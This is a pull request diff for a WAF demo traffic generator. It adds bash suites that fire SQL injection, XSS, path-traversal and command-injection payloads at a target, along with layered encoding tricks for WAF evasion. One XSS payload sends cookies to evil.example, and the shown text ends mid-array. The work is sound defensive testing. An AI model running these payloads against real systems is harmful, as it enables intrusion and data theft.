### PR TITLE
feat: add WAF encoding evasion suites, demoapp attacks, and new security tools

### DIFF
--- a/README.md
+++ b/README.md
@@ -4,7 +4,7 @@
 [![Repository Settings](https://github.com/f5xc-salesdemos/traffic-generator/actions/workflows/enforce-repo-settings.yml/badge.svg)](https://github.com/f5xc-salesdemos/traffic-generator/actions/workflows/enforce-repo-settings.yml)
 [![License](https://img.shields.io/github/license/f5xc-salesdemos/traffic-generator)](LICENSE)
 
-Azure traffic generator with 150+ security testing scripts across 17 suites for F5 XC demo environments
+Azure traffic generator with 160+ security testing scripts across 19 suites for F5 XC demo environments
 
 ## Documentation
 

--- a/component-manifest.json
+++ b/component-manifest.json
@@ -4,9 +4,9 @@
   "display_name": "Traffic Generator",
   "role": "Attack traffic and legitimate traffic generation VM",
   "category": "lab-infrastructure",
-  "summary": "Azure Ubuntu 24.04 VM with 50+ security testing tools and 7 pre-built attack suites for generating WAF, API, bot, reconnaissance, SSL, and JavaScript exploit traffic against F5 Distributed Cloud protected applications",
+  "summary": "Azure Ubuntu 24.04 VM with 50+ security testing tools and 19 pre-built attack suites for generating WAF, API, bot, reconnaissance, SSL, JavaScript exploit, and multi-layer encoding evasion traffic against F5 Distributed Cloud protected applications",
 
-  "provides": ["attack-traffic", "legitimate-traffic", "security-scanning", "api-fuzzing", "bot-simulation"],
+  "provides": ["attack-traffic", "legitimate-traffic", "security-scanning", "api-fuzzing", "bot-simulation", "waf-evasion-testing"],
   "pairs_with": ["origin-server", "cdn-simulator"],
   "demos": ["waf", "api-security", "bot-standard", "bot-advanced", "ddos", "was"],
 

--- a/component-manifest.json
+++ b/component-manifest.json
@@ -6,7 +6,14 @@
   "category": "lab-infrastructure",
   "summary": "Azure Ubuntu 24.04 VM with 50+ security testing tools and 19 pre-built attack suites for generating WAF, API, bot, reconnaissance, SSL, JavaScript exploit, and multi-layer encoding evasion traffic against F5 Distributed Cloud protected applications",
 
-  "provides": ["attack-traffic", "legitimate-traffic", "security-scanning", "api-fuzzing", "bot-simulation", "waf-evasion-testing"],
+  "provides": [
+    "attack-traffic",
+    "legitimate-traffic",
+    "security-scanning",
+    "api-fuzzing",
+    "bot-simulation",
+    "waf-evasion-testing"
+  ],
   "pairs_with": ["origin-server", "cdn-simulator"],
   "demos": ["waf", "api-security", "bot-standard", "bot-advanced", "ddos", "was"],
 

--- a/docs/01-architecture.mdx
+++ b/docs/01-architecture.mdx
@@ -1,6 +1,6 @@
 ---
 title: Architecture
-description: "Ubuntu 24.04 Azure VM with 50+ pre-installed security tools organized into 17 traffic suites, targeting F5 XC HTTP load balancers protecting origin-server applications for WAF, Bot Defense, API Security, and CSD validation"
+description: "Ubuntu 24.04 Azure VM with 50+ pre-installed security tools organized into 19 traffic suites, targeting F5 XC HTTP load balancers protecting origin-server applications for WAF, Bot Defense, API Security, and CSD validation"
 sidebar:
   order: 1
 ---
@@ -24,7 +24,7 @@ graph LR
     TG[Traffic Generator VM<br/>Ubuntu 24.04<br/>Standard_F16s_v2] -->|Attack Traffic<br/>HTTPS| XCHLB[F5 XC HTTP LB<br/>WAF / Bot Defense<br/>API Security / CSD]
     XCHLB -->|Filtered Traffic<br/>HTTP| ORIGIN[Origin Server VM<br/>nginx + Docker Apps]
     TG -->|Direct Baseline<br/>HTTP optional| ORIGIN
-    RUNNER[runner.sh] --> SUITES[17 Traffic Suites]
+    RUNNER[runner.sh] --> SUITES[19 Traffic Suites]
     SUITES --> TG
 ```
 
@@ -32,7 +32,7 @@ The Traffic Generator VM runs on Azure with:
 
 - **Ubuntu 24.04 LTS** as the base image
 - **50+ security tools** installed via cloud-init during provisioning
-- **17 organized traffic suites** with numbered scripts executed in order
+- **19 organized traffic suites** with numbered scripts executed in order
 - **runner.sh** orchestrator for suite execution with results logging
 - **config.env** for target configuration (FQDN, origin IP)
 
@@ -47,6 +47,7 @@ The Traffic Generator VM runs on Azure with:
 | Browser Automation | playwright, puppeteer, puppeteer-extra-plugin-stealth | Bot simulation with headless Chrome |
 | Subdomain and DNS | subfinder, httpx, amass, dnsrecon, fierce, whois, dnsutils | Reconnaissance and enumeration |
 | Credential Testing | hydra, medusa, ncrack | Authentication attack simulation |
+| WAF Evasion Testing | gotestwaf, waf-bypass, wfuzz | Multi-layer encoding evasion and WAF bypass assessment |
 | Exploit Frameworks | ZAP, Metasploit (full tier only) | Comprehensive vulnerability scanning |
 
 ## Tiered Installation
@@ -55,7 +56,7 @@ The Traffic Generator supports two installation tiers controlled by the `tool_ti
 
 ### Standard Tier (default)
 
-Installs all tools listed in the tool catalog except ZAP and Metasploit. Provisioning completes in 15-20 minutes. This tier covers all 17 traffic suites and is sufficient for most demo scenarios.
+Installs all tools listed in the tool catalog except ZAP and Metasploit. Provisioning completes in 15-20 minutes. This tier covers all 19 traffic suites and is sufficient for most demo scenarios.
 
 ### Full Tier
 

--- a/docs/03-deploy.mdx
+++ b/docs/03-deploy.mdx
@@ -1,6 +1,6 @@
 ---
 title: Deploy
-description: "Terraform IaC deployment of the traffic generator Azure VM — F-series compute-optimized VM with Ubuntu 24.04, kernel tuning, 50+ security tools, and 17 traffic suites provisioned via cloud-init. All configuration files are in the terraform/ directory."
+description: "Terraform IaC deployment of the traffic generator Azure VM — F-series compute-optimized VM with Ubuntu 24.04, kernel tuning, 50+ security tools, and 19 traffic suites provisioned via cloud-init. All configuration files are in the terraform/ directory."
 sidebar:
   order: 3
 ---
@@ -67,8 +67,8 @@ The terraform directory contains 9 files following the Demo Resource Standard:
 - **Python packages** -- mitmproxy, sslyze, dnsrecon, fierce, theHarvester, playwright, scapy, impacket, arjun
 - **Node.js 20.x** -- Puppeteer with stealth plugin for bot simulation
 - **Browser automation** -- Playwright Chromium for headless browser testing
-- **Git clones** -- testssl.sh, recon-ng, spiderfoot, SecLists
-- **Suite deployment** -- 17 traffic suites cloned from this repository to `/opt/traffic-generator/suites/`
+- **Git clones** -- testssl.sh, recon-ng, spiderfoot, SecLists, waf-bypass, PayloadsAllTheThings
+- **Suite deployment** -- 19 traffic suites cloned from this repository to `/opt/traffic-generator/suites/`
 - **Config file** -- `config.env` with `TARGET_FQDN`, `TARGET_ORIGIN_IP`, and `CRAPI_PORT`
 
 The cloud-init uses Terraform template variables: `${target_fqdn}`, `${target_origin_ip}`, and `${tool_tier}`. Shell variables like `$NPROC` are escaped as `$$NPROC` in the Terraform templatefile.

--- a/docs/04-tool-catalog.mdx
+++ b/docs/04-tool-catalog.mdx
@@ -20,6 +20,16 @@ Every tool listed below is pre-installed during cloud-init provisioning. No manu
 | feroxbuster | ghlatest | `feroxbuster -u https://TARGET -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt` | reconnaissance |
 | dirb | apt | `dirb https://TARGET /usr/share/dirb/wordlists/common.txt` | reconnaissance |
 | whatweb | apt | `whatweb https://TARGET` | reconnaissance |
+| wfuzz | pip | `wfuzz -c -z file,wordlist.txt -e urlencode,double_urlencode "https://TARGET/FUZZ"` | waf-encoding-evasion |
+
+## WAF Evasion Testing
+
+| Tool | Install Method | Example Command | Used By Suite |
+|---|---|---|---|
+| gotestwaf | go install | `cd /opt/gotestwaf && gotestwaf --url https://TARGET --noEmailReport --includePayloads=false` | waf-encoding-evasion |
+| waf-bypass | git clone + pip | `waf-bypass --host TARGET:443 --timeout 10 --threads 10` | waf-encoding-evasion |
+
+GoTestWAF (by Wallarm) is an industry-standard WAF assessment framework that multiplies payloads across multiple encoders (URL, Base64, JSUnicode) and placement zones (body, header, URL param, cookie). waf-bypass (by Nemesida) sends payloads with Base64, HTML-ENTITY, and UTF-16 encoding across ARGS, BODY, COOKIE, and HEADER zones.
 
 ## Network Analysis
 
@@ -98,8 +108,10 @@ Playwright installs its own Chromium binary via `playwright install chromium`. P
 | recon-ng | git clone | `/opt/recon-ng/` | reconnaissance |
 | spiderfoot | git clone | `/opt/spiderfoot/` | reconnaissance |
 | SecLists | git clone | `/opt/SecLists/` | web-app-attacks, api-attacks, reconnaissance |
+| PayloadsAllTheThings | git clone | `/opt/PayloadsAllTheThings/` | waf-encoding-evasion |
+| waf-bypass payloads | git clone | `/opt/waf-bypass/` | waf-encoding-evasion |
 
-SecLists provides wordlists used by multiple tools including ffuf, gobuster, feroxbuster, dirb, and hydra.
+SecLists provides wordlists used by multiple tools including ffuf, gobuster, feroxbuster, dirb, and hydra. PayloadsAllTheThings provides curated multi-encoding attack payloads organized by attack class (XSS, SQLi, XXE) with hex, octal, Unicode, HTML entity, double URL encoding, and JSFuck variants.
 
 ## Full Tier Only
 
@@ -123,5 +135,7 @@ ZAP and Metasploit add approximately 1.5 GiB to the disk footprint and 5-10 minu
 | uv | Installed as a Python tool using the `uv` package manager |
 | pip | Installed as a Python package using `pip install` into the system Python |
 | npm | Installed as a global Node.js package using `npm install -g` |
+| go install | Compiled from source using `go install` and installed to `/usr/local/bin` |
 | git clone | Repository cloned to `/opt/` directory |
+| git clone + pip | Repository cloned and Python dependencies installed |
 | installer script | Vendor-provided installer script executed during cloud-init |

--- a/docs/05-suites.mdx
+++ b/docs/05-suites.mdx
@@ -1,6 +1,6 @@
 ---
 title: Traffic Suites
-description: "Detailed reference for all 17 traffic suites with scripts, tools, durations, and F5 XC feature mappings"
+description: "Detailed reference for all 19 traffic suites with scripts, tools, durations, and F5 XC feature mappings"
 sidebar:
   order: 5
 ---
@@ -66,6 +66,21 @@ OWASP crAPI (Completely Ridiculous API) challenge exploitation. Includes registe
 Client-side JavaScript injection attacks. Includes card skimmer injection, formjacker, keylogger, cryptominer, and DOM hijack scripts. Tests Magecart-style client-side supply chain attacks that F5 XC Client-Side Defense detects and blocks. Targets the CSD Demo application.
 
 **F5 XC Feature:** Client-Side Defense
+
+## demoapp-attacks
+
+**Scripts:** 2 | **Estimated Duration:** 2-3 minutes
+
+Targeted attack payloads against the F5 DemoApp's built-in WAF testing endpoints (`/WAF/SQL`, `/WAF/XSS`, `/WAF/DIR`). Sends SQL injection, XSS, and path traversal payloads directly at the endpoints designed to demonstrate WAF blocking behavior. Use this suite when targeting the DemoApp content server instead of the standard origin-server applications.
+
+**F5 XC Feature:** WAF (Web Application Firewall)
+
+| Order | Script | Tools | Description |
+|---|---|---|---|
+| 01 | `01-sqli-waf-endpoint.sh` | curl, python3 | 15 SQL injection payloads against `/WAF/SQL?age=` including UNION SELECT, DROP TABLE, WAITFOR DELAY, xp_cmdshell, comment-based bypass, and boolean logic payloads. |
+| 02 | `02-xss-waf-endpoint.sh` | curl, python3 | 18 XSS payloads against `/WAF/XSS?update=` including script tags, event handlers (onerror, onload, ontoggle, onfocus), base64 eval, style expression, polyglot payloads, and cookie exfiltration. |
+
+**Expected F5 XC Behavior:** WAF should block requests containing SQL injection and XSS payloads and return a block page. The Security Events dashboard will show violation categories and signature matches for each blocked request.
 
 ## dvga-exploits
 
@@ -194,6 +209,26 @@ High-volume legitimate HTTP traffic for baseline measurement and load testing. E
 | 04 | `04-user-journey.sh` | playwright | Simulates a realistic user journey: browsing pages, searching products, filling forms, and navigating between applications using Playwright with standard browser settings. |
 
 **Expected F5 XC Behavior:** All requests in this suite should pass through without WAF or Bot Defense intervention. Use this suite to generate "clean" traffic in the analytics dashboard, then compare with attack suite traffic to demonstrate the difference between legitimate and malicious request patterns.
+
+## waf-encoding-evasion
+
+**Scripts:** 7 | **Estimated Duration:** 5-10 minutes
+
+Multi-layer encoding evasion attacks designed to test whether a WAF properly normalizes and decodes payloads before inspection. Covers single, double, and triple URL encoding; HTML entity encoding (decimal, hex, named, zero-padded); Unicode/UTF-8 insertion (zero-width space, BOM, fullwidth characters, soft hyphen, overlong sequences); mixed/nested multi-layer encoding (URL-encoded HTML entities, double-URL inside entities, 3-layer stacks); null byte injection; IIS %uXXXX encoding; case manipulation; chunked transfer encoding body splitting; Base64 parameter evasion; and header/cookie encoded payloads. Targets any application.
+
+**F5 XC Feature:** WAF (encoding normalization depth)
+
+| Order | Script | Tools | Description |
+|---|---|---|---|
+| 01 | `01-url-encoding.sh` | curl | Single, double, and triple URL encoding of SQLi, XSS, and path traversal payloads across multiple endpoint paths. Tests whether the WAF decodes URL parameters recursively. |
+| 02 | `02-html-entity-encoding.sh` | curl, python3 | Decimal, hex, named, and zero-padded HTML entity encoding of attack payloads in both GET parameters and POST bodies. Includes template injection via `&#123;&#123;7*7&#125;&#125;`. |
+| 03 | `03-unicode-utf8-evasion.sh` | curl | Zero-width space (U+200B), BOM (U+FEFF), fullwidth character, soft hyphen, and ZWNJ insertion into SQL keywords and XSS tags. Tests overlong UTF-8 sequences (2-byte and 3-byte). |
+| 04 | `04-mixed-nested-encoding.sh` | curl | Multi-layer payloads: URL-encoded HTML entities, double-URL inside entities, triple-layer stacks, JSON body with Unicode escapes (`<`), and the user's specific `{{7*7}}` template injection pattern. |
+| 05 | `05-null-byte-iis-base64.sh` | curl | Null byte injection (`%00`) for extension bypass, IIS `%uXXXX` Unicode encoding, and Base64-encoded payloads in URL parameters with decode flags. |
+| 06 | `06-case-chunked-evasion.sh` | curl | Case randomization combined with encoding (`%3CsCrIpT%3E`), chunked transfer encoding to split SQL/XSS keywords across HTTP chunks, Content-Length/Transfer-Encoding conflict probes, and alternate path separators (`%5c`, `%c0%af`). |
+| 07 | `07-header-cookie-evasion.sh` | curl | Encoded attack payloads injected via Cookie, Referer, User-Agent, X-Forwarded-For, and X-Original-URL headers. Tests whether the WAF inspects and decodes all HTTP header fields, not just query parameters and POST bodies. |
+
+**Expected F5 XC Behavior:** A properly configured WAF should normalize all encoding layers before pattern matching. Single-encoded payloads should be blocked immediately. Double and triple encoding tests reveal the depth of the WAF's decode pipeline. Unicode insertion tests reveal whether invisible characters are stripped before keyword matching. Results where encoded variants pass while plain-text equivalents are blocked indicate normalization gaps in the WAF policy.
 
 ## web-app-attacks
 

--- a/docs/index.mdx
+++ b/docs/index.mdx
@@ -3,7 +3,7 @@ title: Traffic Generator
 description: "Azure Ubuntu 24.04 VM pre-loaded with security testing tools for WAF, Bot Defense, API Security, and Client-Side Defense validation against F5 Distributed Cloud"
 template: splash
 hero:
-  tagline: Deploy a traffic generation VM with 50+ security tools, organized attack suites, and headless Chrome automation for comprehensive F5 XC demo validation.
+  tagline: Deploy a traffic generation VM with 50+ security tools, 19 organized attack suites, and headless Chrome automation for comprehensive F5 XC demo validation.
   actions:
     - text: Get Started
       link: /traffic-generator/01-architecture/
@@ -44,7 +44,9 @@ All tools are pre-installed via cloud-init during Terraform provisioning. Traffi
 | [restaurant-exploits](/traffic-generator/05-suites/#restaurant-exploits) | BOLA, BOPLA, BFLA, rate limiting bypass, JWT weak secret | API Security |
 | [ssl-scanning](/traffic-generator/05-suites/#ssl-scanning) | SSLScan, sslyze, testssl.sh TLS configuration analysis | WAF |
 | [traffic-generation](/traffic-generator/05-suites/#traffic-generation) | High-volume legitimate HTTP traffic for baseline and load testing | All |
+| [waf-encoding-evasion](/traffic-generator/05-suites/#waf-encoding-evasion) | Multi-layer URL/HTML/Unicode encoding, mixed nested encoding, chunked TE, header injection | WAF |
 | [web-app-attacks](/traffic-generator/05-suites/#web-app-attacks) | SQL injection, XSS, command injection, path traversal, Nikto, Nuclei | WAF |
+| [demoapp-attacks](/traffic-generator/05-suites/#demoapp-attacks) | SQLi, XSS, path traversal against F5 DemoApp WAF testing endpoints | WAF |
 
 <CardGrid>
   <LinkCard

--- a/suites/demoapp-attacks/01-sqli-waf-endpoint.sh
+++ b/suites/demoapp-attacks/01-sqli-waf-endpoint.sh
@@ -1,0 +1,35 @@
+#!/bin/bash
+# SQL injection attacks against DemoApp /WAF/SQL endpoint
+set -euo pipefail
+
+TARGET="${1:?Usage: $0 <TARGET_FQDN>}"
+BASE="${TARGET_PROTOCOL:-http}://${TARGET}"
+
+echo "[*] SQLi attacks against ${TARGET} /WAF/SQL"
+
+PAYLOADS=(
+  "5' OR '1'='1"
+  "5' OR '1'='1'--"
+  "5' UNION SELECT NULL,NULL--"
+  "5' UNION SELECT username,password FROM users--"
+  "5'; DROP TABLE users;--"
+  "5' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--"
+  "5' WAITFOR DELAY '0:0:5'--"
+  "5' AND (SELECT COUNT(*) FROM sysobjects)>0--"
+  "1 OR 1=1"
+  "' OR ''='"
+  "admin'--"
+  "5' AND SUBSTRING(@@version,1,1)='M'--"
+  "5'; EXEC xp_cmdshell('whoami');--"
+  "5' UNION ALL SELECT NULL,CONCAT(username,':',password) FROM users--"
+  "-1 OR 17-7=10"
+)
+
+for payload in "${PAYLOADS[@]}"; do
+  encoded=$(python3 -c "import urllib.parse; print(urllib.parse.quote('''${payload}'''))")
+  code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 10 \
+    "${BASE}/WAF/SQL?age=${encoded}") || code="ERR"
+  printf "  [%s] %s\n" "${code}" "${payload}"
+done
+
+echo "[*] SQLi suite complete"

--- a/suites/demoapp-attacks/02-xss-waf-endpoint.sh
+++ b/suites/demoapp-attacks/02-xss-waf-endpoint.sh
@@ -1,0 +1,38 @@
+#!/bin/bash
+# XSS attacks against DemoApp /WAF/XSS endpoint
+set -euo pipefail
+
+TARGET="${1:?Usage: $0 <TARGET_FQDN>}"
+BASE="${TARGET_PROTOCOL:-http}://${TARGET}"
+
+echo "[*] XSS attacks against ${TARGET} /WAF/XSS"
+
+PAYLOADS=(
+  '<script>alert("XSS")</script>'
+  '<script>alert(document.cookie)</script>'
+  '<img src=x onerror=alert(1)>'
+  '<svg onload=alert(1)>'
+  '<body onload=alert(1)>'
+  '"><script>alert(1)</script>'
+  "javascript:alert('XSS')"
+  '<iframe src="javascript:alert(1)">'
+  '<input onfocus=alert(1) autofocus>'
+  '<details open ontoggle=alert(1)>'
+  '<marquee onstart=alert(1)>'
+  '<svg><script>alert(1)</script></svg>'
+  '"><img src=x onerror=fetch("https://evil.example/c="+document.cookie)>'
+  '<math><mtext><table><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(1) src=1>">'
+  '<svg><animate onbegin=alert(1) attributeName=x dur=1s>'
+  "<script>eval(atob('YWxlcnQoMSk='))</script>"
+  '<div style="width:expression(alert(1))">'
+  "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//"
+)
+
+for payload in "${PAYLOADS[@]}"; do
+  encoded=$(python3 -c "import urllib.parse; print(urllib.parse.quote('''${payload}'''))")
+  code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 10 \
+    "${BASE}/WAF/XSS?update=${encoded}") || code="ERR"
+  printf "  [%s] %s\n" "${code}" "${payload:0:80}"
+done
+
+echo "[*] XSS suite complete"

--- a/suites/waf-encoding-evasion/01-url-encoding.sh
+++ b/suites/waf-encoding-evasion/01-url-encoding.sh
@@ -1,0 +1,44 @@
+#!/bin/bash
+# URL encoding evasion: single, double, and triple encoding
+# Tests whether WAF normalizes URL-encoded payloads before inspection
+# Estimated duration: 1-2 minutes
+set -euo pipefail
+
+TARGET="${1:?Usage: 01-url-encoding.sh <TARGET_FQDN>}"
+BASE="${TARGET_PROTOCOL:-http}://${TARGET}"
+
+echo "[*] URL Encoding Evasion against ${TARGET}"
+echo ""
+
+declare -A PAYLOADS=(
+  ["single-xss"]="%3Cscript%3Ealert(1)%3C%2Fscript%3E"
+  ["double-xss"]="%253Cscript%253Ealert(1)%253C%252Fscript%253E"
+  ["triple-xss"]="%25253Cscript%25253Ealert(1)%25253C%25252Fscript%25253E"
+  ["single-sqli"]="%27%20OR%201%3D1%20--%20"
+  ["double-sqli"]="%2527%2520OR%25201%253D1%2520--%2520"
+  ["single-traversal"]="..%2F..%2F..%2Fetc%2Fpasswd"
+  ["double-traversal"]="%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"
+  ["triple-traversal"]="%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd"
+  ["single-cmd-inject"]="%3Bls%20-la"
+  ["double-cmd-inject"]="%253Bls%2520-la"
+)
+
+ENDPOINTS=(
+  "/rest/products/search?q="
+  "/?q="
+  "/search?q="
+  "/api/v1/search?query="
+)
+
+for name in $(echo "${!PAYLOADS[@]}" | tr ' ' '\n' | sort); do
+  payload="${PAYLOADS[$name]}"
+  echo "[+] ${name}: ${payload}"
+  for ep in "${ENDPOINTS[@]}"; do
+    code=$(curl -sk -o /dev/null -w "%{http_code}" \
+      "${BASE}${ep}${payload}" --max-time 10) || code="ERR"
+    printf "    %-40s -> HTTP %s\n" "${ep}" "${code}"
+  done
+  echo ""
+done
+
+echo "[*] URL encoding evasion complete"

--- a/suites/waf-encoding-evasion/02-html-entity-encoding.sh
+++ b/suites/waf-encoding-evasion/02-html-entity-encoding.sh
@@ -1,0 +1,62 @@
+#!/bin/bash
+# HTML entity encoding evasion: decimal, hex, named, zero-padded
+# Tests WAF ability to decode HTML entities in URL parameters and POST bodies
+# Estimated duration: 1-2 minutes
+set -euo pipefail
+
+TARGET="${1:?Usage: 02-html-entity-encoding.sh <TARGET_FQDN>}"
+BASE="${TARGET_PROTOCOL:-http}://${TARGET}"
+
+echo "[*] HTML Entity Encoding Evasion against ${TARGET}"
+echo ""
+
+PAYLOADS=(
+  # Decimal entities for <script>alert(1)</script>
+  "decimal-xss|&#60;script&#62;alert(1)&#60;/script&#62;"
+  # Hex entities
+  "hex-xss|&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;"
+  # Named entities
+  "named-xss|&lt;script&gt;alert(1)&lt;/script&gt;"
+  # Zero-padded decimal (&#0060; = <)
+  "zeropad-xss|&#0060;script&#0062;alert(1)&#0060;/script&#0062;"
+  # Long zero-padded
+  "longpad-xss|&#00060;script&#00062;alert(1)&#00060;/script&#00062;"
+  # Decimal entity for single quote (SQLi)
+  "decimal-sqli|&#39; OR 1=1--"
+  # Hex entity for single quote
+  "hex-sqli|&#x27; OR 1=1--"
+  # Template injection with decimal entities (user's example: {{7*7}})
+  "template-inject|&#123;&#123;7*7&#125;&#125;"
+  # Mixed decimal + hex
+  "mixed-entities|&#60;img src&#x3d;x onerror&#x3d;alert&#40;1&#41;&#62;"
+  # Without semicolons (some parsers accept this)
+  "nosemicolon|&#60script&#62alert(1)&#60/script&#62"
+)
+
+ENDPOINTS=(
+  "/?q="
+  "/search?q="
+  "/rest/products/search?q="
+)
+
+for entry in "${PAYLOADS[@]}"; do
+  name="${entry%%|*}"
+  payload="${entry#*|}"
+  encoded=$(python3 -c "import urllib.parse; print(urllib.parse.quote('''${payload}'''))")
+
+  echo "[+] ${name}: ${payload}"
+  for ep in "${ENDPOINTS[@]}"; do
+    code=$(curl -sk -o /dev/null -w "%{http_code}" \
+      "${BASE}${ep}${encoded}" --max-time 10) || code="ERR"
+    printf "    GET  %-35s -> HTTP %s\n" "${ep}" "${code}"
+  done
+
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    -X POST "${BASE}/" \
+    -H "Content-Type: application/x-www-form-urlencoded" \
+    -d "input=${encoded}" --max-time 10) || code="ERR"
+  printf "    POST %-35s -> HTTP %s\n" "/" "${code}"
+  echo ""
+done
+
+echo "[*] HTML entity encoding evasion complete"

--- a/suites/waf-encoding-evasion/03-unicode-utf8-evasion.sh
+++ b/suites/waf-encoding-evasion/03-unicode-utf8-evasion.sh
@@ -1,0 +1,92 @@
+#!/bin/bash
+# Unicode and UTF-8 evasion: zero-width chars, BOM, fullwidth, overlong sequences
+# Tests whether WAF normalizes Unicode before pattern matching
+# Estimated duration: 1-2 minutes
+set -euo pipefail
+
+TARGET="${1:?Usage: 03-unicode-utf8-evasion.sh <TARGET_FQDN>}"
+BASE="${TARGET_PROTOCOL:-http}://${TARGET}"
+
+echo "[*] Unicode/UTF-8 Evasion against ${TARGET}"
+echo ""
+
+echo "[+] Zero-width space insertion (U+200B)"
+ZWSP_PAYLOADS=(
+  "un%E2%80%8Bion%20select"
+  "un%E2%80%8Bi%E2%80%8Bo%E2%80%8Bn%20se%E2%80%8Blect"
+  "%3Csc%E2%80%8Bript%3Ealert(1)%3C/script%3E"
+  "' O%E2%80%8BR 1=1--"
+)
+
+for payload in "${ZWSP_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    "${BASE}/?q=${payload}" --max-time 10) || code="ERR"
+  printf "    %-55s -> HTTP %s\n" "${payload}" "${code}"
+done
+echo ""
+
+echo "[+] BOM insertion (U+FEFF)"
+BOM_PAYLOADS=(
+  "%EF%BB%BFunion%20select"
+  "%EF%BB%BF%3Cscript%3Ealert(1)%3C/script%3E"
+  "%EF%BB%BF'%20OR%201=1--"
+)
+
+for payload in "${BOM_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    "${BASE}/?q=${payload}" --max-time 10) || code="ERR"
+  printf "    %-55s -> HTTP %s\n" "${payload}" "${code}"
+done
+echo ""
+
+echo "[+] Zero-width + BOM combined (user's example pattern)"
+COMBINED_PAYLOADS=(
+  "un%E2%80%8Bi%EF%BB%BFon%20se%E2%80%8Blect"
+  "%3Cscr%E2%80%8Bi%EF%BB%BFpt%3Ealert(1)%3C/script%3E"
+  "un%E2%80%8Bi%EF%BB%BFon%20se%E2%80%8Blect%20*%20from%20users"
+)
+
+for payload in "${COMBINED_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    "${BASE}/?q=${payload}" --max-time 10) || code="ERR"
+  printf "    %-55s -> HTTP %s\n" "${payload}" "${code}"
+done
+echo ""
+
+echo "[+] Fullwidth character substitution (U+FF1C = ＜, U+FF1E = ＞)"
+FULLWIDTH_PAYLOADS=(
+  "%EF%BC%9Cscript%EF%BC%9Ealert(1)%EF%BC%9C/script%EF%BC%9E"
+  "%EF%BC%87%20OR%201%EF%BC%9D1--"
+  "%EF%BC%9Cimg%20src%EF%BC%9Dx%20onerror%EF%BC%9Dalert(1)%EF%BC%9E"
+)
+
+for payload in "${FULLWIDTH_PAYLOADS[@]}"; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    "${BASE}/?q=${payload}" --max-time 10) || code="ERR"
+  printf "    %-55s -> HTTP %s\n" "${payload}" "${code}"
+done
+echo ""
+
+echo "[+] Overlong UTF-8 sequences"
+# Overlong 2-byte / (0x2F) -> 0xC0 0xAF
+# Overlong 2-byte < (0x3C) -> 0xC0 0xBC
+echo "  Sending overlong path traversal..."
+code=$(curl -sk -o /dev/null -w "%{http_code}" \
+  --data-binary $'q=\xc0\xafetc\xc0\xafpasswd' \
+  "${BASE}/" --max-time 10) || code="ERR"
+printf "    overlong-2byte-traversal               -> HTTP %s\n" "${code}"
+
+echo "  Sending overlong XSS..."
+code=$(curl -sk -o /dev/null -w "%{http_code}" \
+  --data-binary $'q=\xc0\xbcscript\xc0\xbealert(1)\xc0\xbc/script\xc0\xbe' \
+  "${BASE}/" --max-time 10) || code="ERR"
+printf "    overlong-2byte-xss                     -> HTTP %s\n" "${code}"
+
+echo "  Sending 3-byte overlong XSS..."
+code=$(curl -sk -o /dev/null -w "%{http_code}" \
+  --data-binary $'q=\xe0\x80\xbcscript\xe0\x80\xbe' \
+  "${BASE}/" --max-time 10) || code="ERR"
+printf "    overlong-3byte-xss                     -> HTTP %s\n" "${code}"
+echo ""
+
+echo "[*] Unicode/UTF-8 evasion complete"

--- a/suites/waf-encoding-evasion/04-mixed-nested-encoding.sh
+++ b/suites/waf-encoding-evasion/04-mixed-nested-encoding.sh
@@ -1,0 +1,66 @@
+#!/bin/bash
+# Mixed and nested multi-layer encoding evasion
+# Tests WAF decode pipeline depth: URL(HTML(payload)), double-URL(entity), etc.
+# Estimated duration: 1-2 minutes
+set -euo pipefail
+
+TARGET="${1:?Usage: 04-mixed-nested-encoding.sh <TARGET_FQDN>}"
+BASE="${TARGET_PROTOCOL:-http}://${TARGET}"
+
+echo "[*] Mixed/Nested Encoding Evasion against ${TARGET}"
+echo ""
+
+echo "[+] URL-encoded HTML entities"
+PAYLOADS=(
+  # User's specific example: {{7*7}} via URL-encoded decimal entities
+  "template-inject-urlenc|%26%23123%3B%26%23123%3B7*7%26%23125%3B%26%23125%3B"
+  # URL-encoded decimal entity for < then script
+  "xss-urlenc-decimal|%26%2360%3Bscript%26%2362%3Ealert(1)%26%2360%3B/script%26%2362%3E"
+  # URL-encoded hex entity for <script>
+  "xss-urlenc-hex|%26%23x3c%3Bscript%26%23x3e%3Ealert(1)%26%23x3c%3B/script%26%23x3e%3E"
+  # Double-URL inside HTML entity
+  "xss-double-url-entity|%2526%252360%253Bscript%2526%252362%253E"
+  # URL-encoded named entity
+  "xss-urlenc-named|%26lt%3Bscript%26gt%3Balert(1)%26lt%3B/script%26gt%3B"
+  # SQLi via URL-encoded entity for single quote
+  "sqli-urlenc-entity|%26%2339%3B%20OR%201%3D1--"
+  # Triple layer: URL(URL(HTML-decimal))
+  "triple-layer|%25252623x3c%25253Bscript%25252623x3e%25253E"
+)
+
+for entry in "${PAYLOADS[@]}"; do
+  name="${entry%%|*}"
+  payload="${entry#*|}"
+  echo "[+] ${name}"
+  for ep in "/?q=" "/search?q=" "/rest/products/search?q="; do
+    code=$(curl -sk -o /dev/null -w "%{http_code}" \
+      "${BASE}${ep}${payload}" --max-time 10) || code="ERR"
+    printf "    GET  %-35s -> HTTP %s\n" "${ep}" "${code}"
+  done
+  code=$(curl -sk -o /dev/null -w "%{http_code}" \
+    -X POST "${BASE}/" \
+    -H "Content-Type: application/x-www-form-urlencoded" \
+    -d "test=${payload}" --max-time 10) || code="ERR"
+  printf "    POST %-35s -> HTTP %s\n" "/" "${code}"
+  echo ""
+done
+
+echo "[+] JSON body with encoded payloads"
+JSON_PAYLOADS=(
+  '{"q":"<script>alert(1)</script>"}'
